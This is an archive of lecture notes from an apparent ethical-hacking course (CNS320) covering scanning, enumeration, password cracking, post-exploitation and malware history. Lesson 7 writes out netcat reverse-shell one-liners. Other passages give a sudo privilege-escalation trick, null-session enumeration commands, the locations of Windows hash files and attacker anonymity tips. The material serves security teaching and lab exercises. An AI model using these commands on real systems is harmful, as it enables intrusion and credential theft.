Monthly Archives: January 2016

CNS320 Lesson 8 – Malware

Lesson 8 – Malware

Screen Shot 2016-01-24 at 2.01.47 PM.png

  • dr-mario-virus-dancing-gif-davesgeekyideas.gif

Screen Shot 2016-01-24 at 1.56.39 PM.png

Screen Shot 2016-01-24 at 1.56.40 PM.png

  • Blackmail and extortion runs the gamut from encrypting your files and holding them ransom or stealing nude pics and making you pay the attacker not to blast them all over the internet

Screen Shot 2016-01-24 at 1.56.41 PM.png

Screen Shot 2016-01-24 at 1.56.42 PM.png

  • Don’t rely on slowdown and excessive CPU/RAM usage as your prime indicator…that’s usually just a sign that your computer is old piece of shit

Screen Shot 2016-01-24 at 1.56.43 PM.png

Screen Shot 2016-01-24 at 1.56.45 PM.png

  • The malware author first designs the malware
  • Then the malware replicates across networks and machines to victim computers
  • The malware then launches and performs whatever action is intended (holding files ransom, stealing sensitive info, installing keystroke loggers, enrolling the machine in a botnet, just trashing it, etc.)
  • Eventually, researchers and antivirus companies detect the virus in the wild, categorize it, and start building signatures for it
  • When that signature info is incorporated into AV products, antivirus can know recognize it…
  • …and start to eliminate the malware

Screen Shot 2016-01-24 at 1.56.46 PM.png

  • Boot sector viruses target the boot sector or Master Boot Record of hard drives, bootable floppies, CDs, USBs, etc.
  • File viruses infect files (duh).  Adobe PDF is a popular vector.
  • Program viruses infect executables.
  • Network viruses (according to the book) are viruses that spread over the network, usually via email.  It’s not really clear how this is different from a worm.
  • Source code viruses actually look for C, Java, or other source code on a machine and alter it to include malicious code.  These viruses are extremely rare.
  • Macro viruses, the bane of the 90’s, are written in the “macro language” of another application…such as an embedded macro in a Word or Excel document.  The Melissa virus was one of the earliest and most widespread of macro viruses.  Macro viruses have mostly tailed off in popularity.
  • Multipartite viruses utlize more than one of the above methods to infect and spread

Screen Shot 2016-01-24 at 1.56.47 PM.png

Screen Shot 2016-01-24 at 1.56.48 PM.png

  • TSR viruses usually load themselves into memory and then delete any files or binaries they used to get there in the first place.
  • Cavity viruses hide in the unused whitespace inside certain applications and file formats.
  • A tunneling virus is a virus that attempts to intercept anti-virus software before it can detect malicious code. A tunneling virus launches itself under anti-virus programs and then works by going to the operating system’s interruption handlers and intercepting them, thus avoiding detection. Interception programs, which remain in the background of an operating system and catch viruses, become disabled during the course of a tunneling virus.
  • Stealth viruses also use various means to evade antivirus, by means of hooking system calls and interrupts, changing them so that it doesn’t alert AV software.  Difference between it and a tunneling virus is that stealth viruses intercept everything, but tunneling viruses intercept only AV system calls.
  • Camouflage viruses crudely try to masquerade as a legitimate program.  They’re trivial for AV to find and kill.
  • Encrypted viruses come with a decryption module and then try to encrypt the bulk of the viral code and any infected binaries in order to evade signature-based AV.
  • Polymorphic and metamorphic viruses are similar in that both modify the underlying virus code with each iteration.  The difference is that metamorphic code will randomly re-write every part of itself, whereas polymorphic viruses usually have a mutation engine (or decryption module) that stays untouched and unmodified, making polymorphics easier to catch by AV.

Screen Shot 2016-01-24 at 1.56.49 PM.png

Screen Shot 2016-01-24 at 1.56.52 PM.png

Screen Shot 2016-01-24 at 1.56.53 PM.png

Screen Shot 2016-01-24 at 1.56.54 PM.png

Screen Shot 2016-01-24 at 1.56.55 PM.png

  • Creeper was an experimental, benign self-replicating program unleashed on DEC PDP-10 computers running the TENEX operating system.  Reaper was a program written to get rid of Creeper instances, making it the first anti-virus.
  • Rabbit was the first example of a “fork bomb,” a virus that keeps forking new processes of itself until it uses up all the system resources and DoS’s the box
  • Fred Cohen was an engineering student at the University of Southern California who first coined the term “computer virus” with a proof-of-concept program and an accompanying research paper in 1983.
  • Elk Cloner was invented as a prank by teenage computer enthusiast Rick Skrenta.  It was a boot sector virus that infected Apple II floppy disks.  It was harmless, only displaying a taunting message to users, but it could occasionally ruin disks if it accidentally overwrote the wrong part of a floppy’s boot sector.
  • Brain was the first boot sector virus to infect MS-DOS machines, written by Pakistani programmers and brothers Basit and Amjad Alvi.  It was originally written as an anti-piracy program, but unexpectedly spread to other disks.  Mikko Hyponnen of F-Secure tracked down the two brothers in 2011, who still own an IT business in Lahore.
  • The Morris Worm was unleashed on the ARPANet by then Cornell University student Robert Tappan Morris.  Morris said he did it as a way to gauge the size of the Internet, not to cause harm.  The worm spread using several possible methods; it would try to exploit known vulnerabilities in common Unix programs like sendmail, finger, and rlogin and would also try to remotely login by guessing weak passwords.  The worm itself was harmless; it would simple get into a new machine, then look for network neighbors and spread to them too.
  • Morris had written it so that, if it detected there was already a copy of the worm installed, it wouldn’t reinfect……except every seventh time, it would install another copy of itself, ostensibly as protection against false positives or people trying to fool his worm and keep it from spreading.  With enough time, as the worm reinfected the same hosts continuously, it turned into a massive widespread DoS attack.
  • Morris became the first person convicted under the then-new CFAA law.  He eventually served three years probation, did 400 hours of community service, and was fined over $10,000.
  • Morris went on to found several Silicon Valley start-ups and is currently a tenured professor at MIT.

Screen Shot 2016-01-24 at 1.56.56 PM.png

  • A floppy disk of the Morris worm’s source code in the Computer History Museum in Mountain View, CA

Screen Shot 2016-01-24 at 1.56.57 PM.png

  • Pretty sure Michaelangelo was the inspiration for the “Da Vinci virus” in the movie Hackers

Screen Shot 2016-01-24 at 1.56.59 PM.png

  • Code Red worm exploited flaws in Microsoft IIS web servers, Nimda was another devastating worm/file infector combo that used other means to propagate, but could exploit backdoors left behind by old Code Red infections
  • Beast was one of the first reverse shell RATs for Windows.
  • Slammer was a DoS worm that exploited a buffer overflow in Microsoft SQL Server and Desktop Engine to crash Windows machines.
  • Blaster spread via a buffer overflow in the RPC service on TCP port 135 and would try to use infected hosts to DDoS the Windows Update website with a SYN flood.
  • Sasser was another big DoS worm that exploited LSASS (the Local Security Authority Subsystem Service) in Windows 2000 and XP
  • Zeus is one of the longest-lived bank credential-stealing Trojans, keeping alive through changes and variants such as the newer GameOver ZeuS offshoot and merging code with the SpyEye trojan.
  • Conficker was a worm that exploited numerous Windows infections
  • Stuxnet and Duqu may very well be the first and some of the most successful cyberweapons. Leaks from inside the US government allege it was developed as part of a US/Israeli joint operation to target and destroy Iranian uranium enrichment centrifuges.
  • Blackhole is an example of an “exploit kit” or “crimeware kit,” that allows low-skilled cybercriminals to put together bank credential-stealing or botnet-enrolling trojans of their own.
  • Flashback made waves as one of the first widespread Mac OS X pieces of malware.  It used a vulnerability in Java and spread through malicious websites.
  • Flame is another cyberweapon, supposedly developed by the NSA and Israel.
  • CryptoLocker kicked off the era of encryption ransomware.  It and it’s copycats would infect a machine, encrypt all the user’s personal files, then hold them for ransom.  If the user paid the ransom (usually an amount set in an anonymous cryptocurrency like Bitcoin), the malware creator would give them the decryption key so they could access their files again.

Screen Shot 2016-01-24 at 1.57.00 PM.png

  • Glance over this list, because you may see a question or two about suspicious ports on your exam.

Screen Shot 2016-01-24 at 1.57.02 PM.png

Screen Shot 2016-01-24 at 1.57.03 PM.png

  • Air-gapping means the machine is not connected to other machines over network connections.



CNS320 Lesson 7 – Post-Exploitation

Lesson 7 – Post-Exploitation

Screen Shot 2016-01-23 at 10.54.53 PM.png

Screen Shot 2016-01-23 at 10.54.54 PM.png

Screen Shot 2016-01-23 at 10.54.55 PM.png

Screen Shot 2016-01-23 at 11.15.42 PM.png

Screen Shot 2016-01-23 at 10.54.58 PM.png

Screen Shot 2016-01-23 at 10.54.59 PM.png

Screen Shot 2016-01-23 at 10.55.00 PM.png

Screen Shot 2016-01-23 at 10.55.01 PM.png

Screen Shot 2016-01-23 at 10.55.03 PM.png

  • Netcat is a tool you will need to get very comfortable with as a pentester.  Netcat is a simple but powerful utility that will allow you to listen on or transmit data over TCP or UDP ports.  It’s built into almost every Linux or Unix OS (including OS X) and versions are availble for Windows and other OS’s too.
  • Some of the popular clones of netcat include ncat (which is part of the Nmap Project and comes bundled with it), socat, CryptCat (which can SSL-encrypt your traffic), and many others

Screen Shot 2016-01-23 at 10.55.04 PM.png

Screen Shot 2016-01-23 at 10.55.05 PM.png

Screen Shot 2016-01-23 at 10.55.07 PM.png

Screen Shot 2016-01-23 at 10.55.08 PM.png

Screen Shot 2016-01-23 at 10.55.12 PM.png

  • Steganography is one of those things you learn in security classes and is fun for hacker CTFs…but I’m not really sure how much it gets used by real attackers.  Or even pentesters on engagements, for that matter.

Screen Shot 2016-01-23 at 10.55.14 PM.png

Screen Shot 2016-01-23 at 10.55.15 PM.png

Screen Shot 2016-01-23 at 10.55.17 PM.png

Screen Shot 2016-01-23 at 10.55.18 PM.png

  • Stego-only attack: you only have the medium with the hidden data in it
  • Known-cover attack: you have a copy of the original medium BEFORE data was hidden in it and a copy of it AFTER data is hidden
  • Known-message attack: you have the medium with hidden data in it and you know what the hidden message is (can determine the steg algorithm with this info)
  • Known-stego attack: you know the steg method used and you have access to the original and modified medium
  • Chosen-stego attack: you have access to different steg tools and you try each them and look for similarities to determine which method was used for the file you’re analysing
  • Chosen-message attack: similar to the above, but using the same message in different tools to look for patterns or signatures

Screen Shot 2016-01-23 at 10.55.20 PM.png

Screen Shot 2016-01-23 at 10.55.22 PM.png

Screen Shot 2016-01-23 at 10.55.23 PM.png

Screen Shot 2016-01-23 at 10.55.25 PM.png

Screen Shot 2016-01-23 at 10.55.26 PM.png

  • The process might get far along, but eventually the program being used to trash the disk will delete itself and stall out, so there will still be something for forensic investigators to pick at…though who knows just what will remain.

Screen Shot 2016-01-23 at 10.55.27 PM.png

  • Also, besides the netcat man page, there are some good recipes buried in the /usr/share/doc/netcat-traditional/ directory on Kali.  Check out README.Debian and README.gz.  Also, there are some very interesting shell scripts that use netcat to do everything from IRC to acting as a crude web server down in the examples subdirectory.
  • Besides all the different variants, there are two mainstream versions of netcat: netcat-traditional and netcat-openbsd.  The netcat-openbsd is the most common version you’ll find that comes installed on Debian, Ubuntu, Redhat, and various other Linux distributions.  The main difference is that the OpenBSD variant has had the “-e” option removed, as a measure to prevent hackers leaving backdoors.
  • Fortunately, there are two different options for sending out a reverse shell without having to use the “-e” flag:
    1.)     mknod backpipe p && nc <remote server> <port> 0<backpipe | /bin/bash 1>backpipe
    2.)     mkfifo pipe && nc <remote serve> <port> < pipe | /bin/bash &> pipe         <——– this one is better, because it will also pipe stderr to you (so you can see error messages)


This is the point in the class where I would start doing actual CTF challenges with the students.  What I usually did was create several VMs on the class server (I didn’t need much horsepower; an old laptop running Linux Mint with about 4GB of RAM sufficed just fine) and assign one to each student for them to hack.  I had pretty small classes, so I this was doable.  I would give them hints, answer questions, guide them in the right direction, get them to help each other out, etc. until they finally solved it.

But for you reading along at home, you should now know enough to try to tackle some of these CTF VMs yourself.  Here are the first few I started them out on:

You can easily download the ISO images and run them in VMware or VirtualBox.  I urge to try to solve them on your own.  The De-ICE ones do have a hint page in the target machine’s website.  If you get really desperate, you can always look at the walkthroughs on their respective VulnHub pages.

Good luck!

CNS320 Lesson 6 – Exploitation

Lesson 6 – Exploitation

Screen Shot 2016-01-23 at 1.37.29 PM.png

Screen Shot 2016-01-23 at 1.37.31 PM.png

Screen Shot 2016-01-23 at 1.37.32 PM.png

Screen Shot 2016-01-23 at 1.37.33 PM.png

Screen Shot 2016-01-23 at 1.37.34 PM.png

  • If you have the ability to listen to traffic on the network (on an open WiFi access point or an old network using hubs, for instance), you could easily find poorly-protected passwords going over the wires.  Services like telnet, FTP, and badly-written websites can transmit password in plain-text over unencrypted channels.
  • The other option is, if the network doesn’t allow you sniff all traffic, then make the traffic come through you!  A man-in-the-middle (MiTM) attack means you get in between your victim and the target you want to access, so you can sniff password or other sensitive info.  More on this subject to come.
  • A compliment to a MiTM attack, or perhaps other attacks we’ll talk about later like cross-site scripting (XSS) or pass-the-hash, is to try a replay attack.  If a system has poor session management or authentication processes, you might be able to capture a hash, access token, session cookie, or similar and just send it to the server, letting you in without ever having to guess or crack your victim’s password.
  • An active online attack would be password guessing, where you connect to the system, web app, etc. and try different passwords.

Screen Shot 2016-01-23 at 1.37.37 PM.png

  • Offline attacks mean that you’ve captured  password hashes, either by stealing the authentication database from a web app, or the Windows SAM file, the Linux shadow file, or similar.  The passwords are in stored in a cryptographic hash format, meaning they’ve been run through a one-way algorithm to generate a fix-length hash (which usually looks like hexadecimal gobbledegook).  The way to crack hashes is to run different words or strings of characters through the same hashing algorithm (such as NTLM for Windows, MD5 for most web apps, etc.), and if you get a match against the stolen hash, then you know that word or string of characters is the password.
  • A dictionary attack is just like what it says: take a dictionary of words, common passwords, or what-have-you and throw it against the system.  The most common and the most effective type of attack.  Kali Linux has several dictionaries in the /usr/share/wordlists directory.  One of the most widely-used is the RockYou list, which is a dump of millions of real-world passwords that were used by users of a popular gaming site that was compromised in 2009.  You’ll also find other wordlists and dictionaries in other app’s directories in the /usr/share tree.
  • Brute-forcing is trying every possible character combination until you find the password.  In essence, you start at “a”, then try “b”, eventually you work up to “aa”, and so on.  In the end, brute forcing will always win…it’s simple a matter of whether it’ll take minutes or centuries to finally guess your password.
  • Hybrid attacks are anything in between.
  • Rainbow tables (AKA precomputed hashes) are just huge lists of millions or billions of different password hashes for you to throw against a certain system (like a list of every possible NTLM hash to try against Windows or every MD5 hash to try against a web app’s stolen password database).  The idea is that you spend the time up-front generating all the possible hashes so that you can then quickly use it against multiple targets.
  • Syllable attacks are a combination of dictionary and brute-forcing, where you might try different permutations of dictionary words (like “password” > “password1” > “p@ssw0rd” etc.)
  • Rule-based attacks are were you have some sort of intelligence about the password policy.  For example, you know that passwords on the system have to be between 8 and 12 characters long, have to have one upper-case and one lower-case letter, and only allow “!” or “@” for special characters.  You could then tailor the attack to only try out guesses that match those rules, e.g., you wouldn’t waste time trying a password like “passwd” or “pa$$word”
  • A distributed attack could be any of the above, except that instead of just one computer trying to crack the password, multiple machines in parallel might each be trying to crack it, each other them divvying up the workload.  This is usually facilitated with a botnet.

Screen Shot 2016-01-23 at 1.37.38 PM.png

  • Shoulder surfing is when an attacker tries to get close to a victim as they are inputing their password and watch the keys pressed.
  • Keyboard sniffers are hardware- or software-based tools that capture the keystrokes a user puts in, which an attacker can then read and learn the victim’s password
  • To paraphrase Kevin Mitnick, why spend hours cracking hashes when users will just give you their passwords?  We’ll cover social engineering more later.

Screen Shot 2016-01-23 at 1.37.40 PM.png

  • John the Ripper is one of the oldest and most widely-used password cracking tools.  It can quickly perform dictionary or brute-force attacks on password hashes.
  • Hashcat is a newer program that offers various types of dictionary, brute-force, and hybrid attack options.  It can also utilize the GPU graphics cards in computers for extremely-fast cracking.
  • Cain and Abel is a Windows-only all-in-one hacking tool.  Password hash cracking is one of its many features.
  • Ophcrack and L0phtcrack are both famous Linux-based tools for cracking Windows LM and NTLM hashes
  • RainbowCrack is, you guessed, used to generate rainbow tables and crack hashes against them
  • There are many other password cracking tools out there, many tailored to specific sorts of password hash formats.

Screen Shot 2016-01-23 at 1.37.41 PM.png

  • THC Hydra is the old gold-standard for brute forcing everything from SSH to FTP to online forms to Cisco appliances.  It takes a user or list of users, then a wordlist of potential passwords, and will go to work brute-forcing logins.
  • Medusa is a work-alike to Hydra that’s meant to be faster and more stable.
  • CeWL is a custom wordlist generator.  It can spider a target’s website(s) and use the information it gathers to build customized wordlists of potential passwords to try out.
  • Burp Suite, WebScarab, and ZAP are all HTTP/S intercept proxies that can be used to attack web logins.  We’ll talk more about them in our lessons on web vulnerabilities.

Screen Shot 2016-01-23 at 1.37.42 PM.png

Screen Shot 2016-01-23 at 1.37.44 PM.png

  • The SAM is well-known for having local usernames and hashes stored in it; if you also have the SYSTEM and SECURITY hives with it, you also get access to cached Active Directory hashes, password history, and other valuable intel
  • Active Directory Domain Controllers have a domain-wide password hash database called NTDS.dit.  If you get NTDS.dit, you have the hashes of every user in the domain.
  • SAM, SYSTEM, and SECURITY are stored in C:\WINDOWS\system32\config\ and the NTDS.dit file is stored in C:\WINDOWS\ntds\
  • You can’t normally get to the SAM, SYSTEM, and SECURITY files while a Windows machine is turned on, but you can steal them out of memory or from Volume Shadow Service (VSS) backup copies, if they exist.  If you have physical access, you can turn the machine off, boot it from a Linux LiveCD or LiveUSB, mount the Windows hard drive, and steal the files.

Screen Shot 2016-01-23 at 1.37.45 PM.png

Screen Shot 2016-01-23 at 1.37.46 PM.png

Screen Shot 2016-01-23 at 1.37.48 PM.png

Screen Shot 2016-01-23 at 1.37.49 PM.png

  • There are lots of tools that will try to dump the SAM file, either out of memory or out of Volume Shadow Service (VSS) backup copies, including pwdump, fgdump, and others.  There’s a cat-and-mouse game between these tools and antivirus detection engines, so they’re constantly being updated, changed, or new ones written.
  • chntpw is a Linux utility you can used when you mount a hard drive with Windows on it to steal hashes or overwrite them with your own
  • NTDSXtract is for stealing hashes from NTDS.dit files
  • Kon-Boot used to be a free tool that is now for-pay, unfortunately.  You would boot it from a CD or USB stick, it would run first, then it would boot Windows and act as a man-in-the-middle rootkit, allowing you to completely bypass the password screen and gain instant access to a Windows workstation.
  • Volume Shadow Service (VSS) is a Windows service that takes backup snapshots of the running Windows OS.  If you have admin-level privileges, you can often find backup copies of the SAM and other important files in here.  There are numerous tools available to automate this.
  • As mentioned, you can just boot Linux from a CD or USB on the victim machine, mount the Windows drive, and steal the file that way

Screen Shot 2016-01-23 at 1.37.50 PM.png

  • WMIC = Windows Management Instrumentation Command-Line
  • Example: “wmic qfe get Caption,Description,HotFixID,InstalledOn” would list out all the hotfix and security patches applied to that Windows install

Screen Shot 2016-01-23 at 1.37.51 PM.png

Screen Shot 2016-01-23 at 1.37.53 PM.png

Screen Shot 2016-01-23 at 1.37.54 PM.png

Screen Shot 2016-01-23 at 1.37.56 PM.png

Screen Shot 2016-01-23 at 1.37.57 PM.png

  • As you’ll see, there’s a lot of things that can go wrong with Linux, especially in regards to privilege escalation via setuid or sudo

Screen Shot 2016-01-23 at 1.37.58 PM.png

Screen Shot 2016-01-23 at 1.38.00 PM.png

Screen Shot 2016-01-23 at 1.38.01 PM.png

Screen Shot 2016-01-23 at 1.38.02 PM.png

  • When Linux systems crash, they often “dump core” and dump the contents of RAM into a file, for the purpose of diagnosing what caused the crash.
  • Users of SSH will have a hidden directory called .ssh automatically created in their home folder.  This could contain keyfiles that they use to login to other servers.

Screen Shot 2016-01-23 at 1.38.04 PM.png

  • Cron is the task scheduling system used by most Linux/Unix systems.  Unfortunately, cron jobs can be all over the place, depending on who or what is scheduling them; hence all the different places you have to look.

Screen Shot 2016-01-23 at 1.38.05 PM.png

  • Hence why dd is sometimes said to stand for “disk destroyer” 🙂

Screen Shot 2016-01-23 at 1.38.06 PM.png

Screen Shot 2016-01-23 at 1.38.08 PM.png

Screen Shot 2016-01-23 at 1.38.09 PM.png

Screen Shot 2016-01-23 at 1.38.10 PM.png

Screen Shot 2016-01-23 at 1.38.11 PM.png

  • Example: you hacked an account with sudo rights, but all it can do is use sudo to execute a script called “”.  Just delete the script (rm, then link the old name to a shell (ln /bin/bash, then run it with sudo permission (sudo ./ and bam, you have root!
  • Another one is if you’re granted sudo rights to some sort of program that can edit files, like nano, vim, or even a hex editor.  You can then run it and change the sudoers file to expand that compromised account’s rights or grant rights to another account of your choosing.

Screen Shot 2016-01-23 at 1.38.13 PM.png

  • Normally, in Linux and Unix, when you run a program, it runs with your own level of permisisons.  But some programs need to run at a higher level of privilege in order to use special OS services, like the “mount” utility that has to interact with the kernel to mount new filesystems.  Instead of giving everyone root permissions, you can just give the program the “setuid” access right so that when normal users run it, it’s as if root was running.
  • An example of exploiting this would be if a text editor owned by root had the setuid attribute set.  If you ran it, you could then go edit the sudoers file, open up and read the shadow file, or otherwise get access to sensitive files beyond your access level.

Screen Shot 2016-01-23 at 1.38.14 PM.png

  • If you always type “ls –al” when listing directory contents, you might make an alias of “ll” or “lal” or even just “ls” for that command and save it to your shell’s config file (usually .profile or .bashrc or similar).  You could also use alias to trick users into executing rootkitted version of apps like top or free to hide your activity.
  • Chroot is in every Unix-like distro.  Jail is much stricter and is mostly seen in BSD distributions.



CNS320 Lesson 5 – Enumeration

Lesson 5 – Enumeration

Screen Shot 2016-01-23 at 1.17.52 PM.png

Screen Shot 2016-01-23 at 1.17.56 PM.png

  • Enumeration is often easy because sysadmins don’t go to the trouble of properly configuring systems and locking them down.
  • Good enumeration saves you time.  You could try every username under the sun, but it’s a better use of your time and effort to figure out for sure which users have accounts on the system and focus on breaking into their accounts.

Screen Shot 2016-01-23 at 1.17.59 PM.png

Screen Shot 2016-01-23 at 1.18.01 PM.png

  • SMB = Server Message Blocks; AKA CIFS (Common Internet File System); AKA Windows shares
  • Remember, SMB isn’t just on Windows boxes!  Mac OS X has switched to SMB as its default network file sharing protocol (replacing AFP) and many Linux system support it via an open-source implementation called Samba.
  • All that said, the null session is kind of a played-out misconfiguration.  It’s mentioned in a lot of pentesting literature, because legacy systems might still have it enabled, and if you do find it, it’s an awesome means of mining data about your target.  However, it’s becoming rarer and rarer, especially in Windows 7/8/10 environments.

Screen Shot 2016-01-23 at 1.18.02 PM.png

Screen Shot 2016-01-23 at 1.18.03 PM.png

Screen Shot 2016-01-23 at 1.18.04 PM.png

  • Winfo is a Windows tool that automates the process of enumerating information using null sessions
  • The original enum was a Windows tool and a work-alike (enum4linux) was written in perl for Linux.  Like winfo, it automates the process of attempting null session attacks and enumeration.
  • DumpSec is a Windows tool for enumerating users, groups, shares, permissions (DACLs), and audit settings (SACLs)
  • Once you make a null session connection with: net use \\<computer name or IP>\ipc$ “” /user:”” ; you can then run: net view \\<computer name or IP> to list out the shares on the computer
  • Nbtstat is a Windows command line to for diagnosing problems with NBT (NetBIOS over TCP).  You can use the -a or -A flags to pull the NetBIOS information of a remote host.
  • Nbtscan is much like nbtstat, but can be used against a range of IP addresses, instead of only one at a time.  Available in Windows and Linux flavors.
  • And (big shock!) nmap has several SMB enumeration scripts to run via the NSE (Nmap Scripting Engine), including smb-enum-shares, smb-enum-groups, smb-enum-processes, and many more.

Screen Shot 2016-01-23 at 1.18.05 PM.png

Screen Shot 2016-01-23 at 1.18.06 PM.png

  • TESTING NOTE: How to set up vulnerable SNMP in Debian/Ubuntu/Linux Mint:
    -sudo apt-get install snmpd
    -Edit /etc/snmp/snmpd.conf, in the AGENT BEHAVIOUR section, comment out “agentAddress udp:” and uncomment “agentAddress udp:161,udp6:[::1]:161”
    -sudo /etc/init.d/snmpd restart

Screen Shot 2016-01-23 at 1.18.08 PM.png

Screen Shot 2016-01-23 at 1.18.09 PM.png

Screen Shot 2016-01-23 at 1.18.10 PM.png

  • EXPN will spit out all the addresses in mailing lists or aliases.  It’s worth a shot to try “EXPN all” and other possible mailing list names.
  • VRFY will verify that an email name (no or whatever at the end) is a valid email address on the system
  • And if all those fail, try entering the following
    MAIL TO: junk@junk.junk
    RCPT TO: <username>
    This is actually writing an email message in a raw SMTP session.  RCPT is specifying who the recipient of the email is going to be.  You can add as many as you like.  If the address is valid, it’ll say OK, else it will throw an error.
  • smtp-user-enum is a Perl script (included with Kali) that can enumerate users using EXPN, VRFY, and RCPT methods, plus taking individual or lists of usernames/email addresses to try out and can enumerate multiple SMTP servers at once.
  • swaks stands for Swiss Army Knife SMTP and is an all-purpose SMTP testing and debugging tool, but is also useful for doing SMTP enumeration work.

Screen Shot 2016-01-23 at 1.18.11 PM.png

  • LDAP (Lightweight Directory Access Protocol) is probably best known as the protocol behind Windows Active Directory, but is also used by Apple for its Open Directory system integrated into Mac OS X and many Linux/Unix systems use implementations of LDAP, such as OpenLDAP and Oracle Internet Directory.
  • NTP (Network Time Protocol) can be abused to reveal peers and clients…in addition to revealing time/time zone, in case you weren’t sure where the target is located in the world.  Nmap scripts like ntp-info and ntp-monlist is probably the easiest way to query it.  Every once in a while, NTP has a bad vulnerability, so pay attention to the ntpd version info it leaks as well.

Screen Shot 2016-01-23 at 1.18.12 PM.png

  • Showmount will enumerate any NFS (Network File System) file shares: showmount –e <IP address or hostname>
  • If you find a host that’s running the finger service on TCP port 79, you can query it for details on user accounts.  In addition to trying to tease normal user accounts out of it, you can look for service accounts (like www-data, ftp, and others) that will indirectly confirm the existence of certain software running.  For example, if you see the “www-data” user, then you know the target system has a web server like Apache installed.  One command to try is finger ‘a b c d e f g h’@<hostname>, which if it works will barf all the users on the system.
  • If you see TCP or UDP port 111 open (nmap will identify it as “portmapper”), you can use the rpcinfo command to see what services and apps on a server map to what ports.  This is a great way to figure out what software is running on the system for looking up exploits later.
  • Dirb is command-line based and Dirbuster is a Java-based GUI, but both do the same thing: take a list of possible names and try to brute-force all the directories under a given hostname, looking for signs of vulnerable software, hidden pages, admin login portals, and other juicy info.  Both come with wordlists of common web server directories in their respective /usr/share/ directories
  • Also, if you’ve fingerprinted certain services and ESPECIALLY certain devices and appliances…go look up their default accounts and passwords online!  Lazy admins often neglect to change them.

CNS320 Lesson 4 – Scanning

Lesson 4 – Scanning

Screen Shot 2016-01-18 at 10.29.19 PM.png

Screen Shot 2016-01-18 at 10.29.20 PM.png

  • OPSEC is a term borrowed from the US military.  In a military context, it means not talking about (or chatting on IRC about, or posting on Facebook about…) military operations, troop movements, new weapons systems, etc. with people who don’t have a need-to-know, because of the risk of this information falling into enemy spies’ hands.
  • In a hacker context, it means not letting information about your identity, geographical location, hacking tools and methods, etc. slip to law enforcement, intelligence agencies, competing hacker groups, or other adversaries.  LulzSec is a great case study in terrible OPSEC resulting in a hacking group being taken down hard.
  • A security researcher known as The Grugq is the authority on hacker OPSEC.  I highly recommend his work on the subject, which can be found here:
  • SPOILER ALERT: The Grugq’s OPSEC advice can be summed up in one acronym – STFU    😉

Screen Shot 2016-01-18 at 10.29.21 PM.png

  • Tor (The Onion Router) is one of the longest-running anonymity network projects on the Internet.  It uses a network of participating nodes to randomly route and anonymize traffic.  Tor also can be used to host so-called “hidden services,” sites that aren’t accessible via the normal Internet and only reachable over Tor (the so-called “Dark Net”).  Perhaps the best known such site was the Silk Road drug marketplace.
  • The easiest way to use it is with the official Tor Browser Bundle, which uses a modified copy of Firefox, but this only protects your web browsing.  To protect more of your traffic, you would need to use either:
  • 1.) A Tor-centric custom Linux distribution, such as TAILS (famously used by Edward Snowden), Liberté, Whonix, and others
  • 2.) A personal router with built-in Tor capabilities, such as the PORTAL router project
  • The Invisible Internet Project (I2P) is a newer project that uses a more decentralized, peer-to-peer anonymization approach, known as “garlic routing.”  One additional advantage is that, unlike Tor, I2P can route both TCP and UDP traffic, whereas Tor can only route TCP.  While, on the surface, it has the potential to be even more secure and hardened against decloaking attacks than Tor, it is a newer project and hasn’t been thoroughly vetted yet.  The third iteration of the Silk Road drug market moved to I2P.

Screen Shot 2016-01-18 at 10.29.22 PM.png

  • Virtual Private Networks (VPNs) are good enough for hiding your movie pirating or evading region detection, but not good enough for evading law enforcement, as several Anonymous and LulzSec members have found out.  Even the ones who claim they never keep logs of your connections.  They can be a useful obfuscation means for an attacker, if used in conjunction with an anonymizer like Tor or I2P.
  • Proxies and proxifiers are also useful for covering an attacker’s tracks, but again aren’t necessarily built for anonymity, so a wise attacker will use them in conjunction with Tor or another anonymizer.
  • For legitimate pen-testers, proxies’ and VPNs’ best use is for evading IDS’s, firewalls, or region restrictions.

Screen Shot 2016-01-18 at 10.29.24 PM.png

Screen Shot 2016-01-18 at 10.29.25 PM.png

Screen Shot 2016-01-18 at 10.29.26 PM.png

Screen Shot 2016-01-18 at 10.29.27 PM.png

Screen Shot 2016-01-18 at 10.29.29 PM.png

  • Call me crazy, but if you’re trying to do a zone transfer off my DNS server, that puts you firmly in the “probably a f**king hacker” category and my firewalls and IDS should act accordingly

Screen Shot 2016-01-18 at 10.29.30 PM.png

  • Google has a plethora of different operators for finding admin login pages, specific sorts of web technology (like phpBB forums or mySQL instances) you might have exploits for, and other sorts of interesting pages.
  • “Robots.txt” is a list of all the pages within a domain that the site owner DOESN’T want search engines to index.  Search engines are nice enough to abide by this convention…but it also gives a juicy list of places for hackers to look for stuff like admin portals, diagnostic pages, etc.

Screen Shot 2016-01-18 at 10.29.31 PM.png

  • For whatever reason, most Unix-like systems have three competing tools for DNS lookups that mostly do the same thing.  They are all three developed by the same organization, Internet System Consortium (ISC), who also make BIND, the de facto standard for DNS server software.  Nslookup is the oldest, dig and host are newer.  Dig is more complex while host is a very simple tool.  ISC tried to kill nslookup in favor of dig, but gave up.
  • Use whatever the hell you want…or more likely, you’ll just be using some other security tool or script that will use one of them for you.

Screen Shot 2016-01-18 at 10.29.33 PM.png

  • Forward lookup = getting the IP address for a given domain name
  • Reverse lookup = getting the domain name for a given IP address (take in mind, this doesn’t always work.  The name server you’re querying has to be storing PTR records for the particular IP addresses)

Screen Shot 2016-01-18 at 10.29.34 PM.png

  • Zone transfer is replicating a DNS server’s entire database of records.

Screen Shot 2016-01-18 at 10.29.35 PM.png

  • One person’s useful tool is another’s malicious hacker cyberweapon.  Some people even act like firing up Wireshark is evil blackhat sort of shit.
  • From here on out, the CEH prep material is extremely tool-centric.  If you read the books for this course, you’ll see an especially large volume of tool vomit.
  • Look at them, be vaguely familiar with many of them…but really, you only have to know a small number of tools extremely well in order to pass the CEH exam.  And we will use those tools extensively in our labs and practical exercises.

Screen Shot 2016-01-18 at 10.29.36 PM.png

  • Many of these tools work the same way; they will attempt to brute-force all the different subdomains of a given domain name (usually from a wordlist), brute-force forward or reverse lookups of names and ranges, attempt zone transfers, etc.

Screen Shot 2016-01-18 at 10.29.38 PM.png

Screen Shot 2016-01-18 at 10.29.39 PM.png

Screen Shot 2016-01-18 at 10.29.40 PM.png

  • As you’ll see in the upcoming slides, nmap really is the total package.  It’s one of the oldest and most versatile security tools out there.

Screen Shot 2016-01-18 at 10.29.44 PM.png

Screen Shot 2016-01-18 at 10.29.47 PM.png

Screen Shot 2016-01-18 at 10.29.48 PM.png

  • Netdiscover is super quick and uses ARP, rather than ICMP, in order to identify live hosts on a subnet
